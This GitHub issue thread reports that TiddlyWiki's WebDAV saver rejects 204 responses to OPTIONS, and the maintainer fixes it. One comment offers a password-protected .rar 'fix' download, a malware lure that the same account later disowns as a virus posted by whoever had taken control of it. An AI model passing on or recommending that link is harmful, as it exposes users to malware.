### ISSUE TITLE
[BUG] TiddlyWiki only recognized WebDAV servers that respond to OPTIONS with 200 status, not 204.

### ISSUE THREAD

**Issue by hperrin** [TiddlyWiki/TiddlyWiki5#8554]
### Describe the bug

When loaded on a WebDAV server, TiddlyWiki will use an OPTIONS request to verify that it is able to save using WebDAV. However, it explicitly checks for a 200 response. As such, when it is on a server that responds with a 204 No Content status, it will not recognize that it can save over WebDAV.

### Expected behavior

Both a 200 response and a 204 response should be accepted and activate TiddlyWiki's WebDAV support.

~~Both are valid responses:
https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS#status_code~~

The spec has no restrictions on successful status codes:
https://httpwg.org/specs/rfc9110.html#OPTIONS

### To Reproduce

You can run TiddlyWiki on a Nephele server to see this issue:

https://hub.docker.com/r/sciactive/nephele

Nephele returns 204 No Content responses to OPTIONS requests.

### Screenshots

![image](https://github.com/user-attachments/assets/15a8c149-ccac-4a25-9be7-d70bdaa5d662)

### TiddlyWiki Configuration

- TiddlyWiki version 5.3.5
- Nephele WebDAV server version 1.0.0-alpha.43

### Additional context

The problem is on this line:

https://github.com/TiddlyWiki/TiddlyWiki5/blob/bcae5cc2ef20e6ca06dbd2d987c3a91a5c2c0341/core/modules/savers/put.js#L58

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jermolene** [comment]
Hi @hperrin thank you for the report, and what a slightly embarrassing error to have slipped through for all this time. I've pushed a fix for the next release.

**Comment by hperrin** [comment]
Thanks for the quick fix. :)

**Comment by MinecraftEarthVillage** [comment]
> 下载 https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file 密码：changeme 在安装程序菜单中，选择“gcc”。

不要下载我前段时间发的文件，那不是我发的，是另一个人控制我，如果你使用了这个病毒文件，你也会被控制，并且疯狂转发这个病毒
Don't download the file I sent some time ago, it wasn't me, but another person controlled me. If you use this virus file, you will also be controlled and forward this virus crazily.
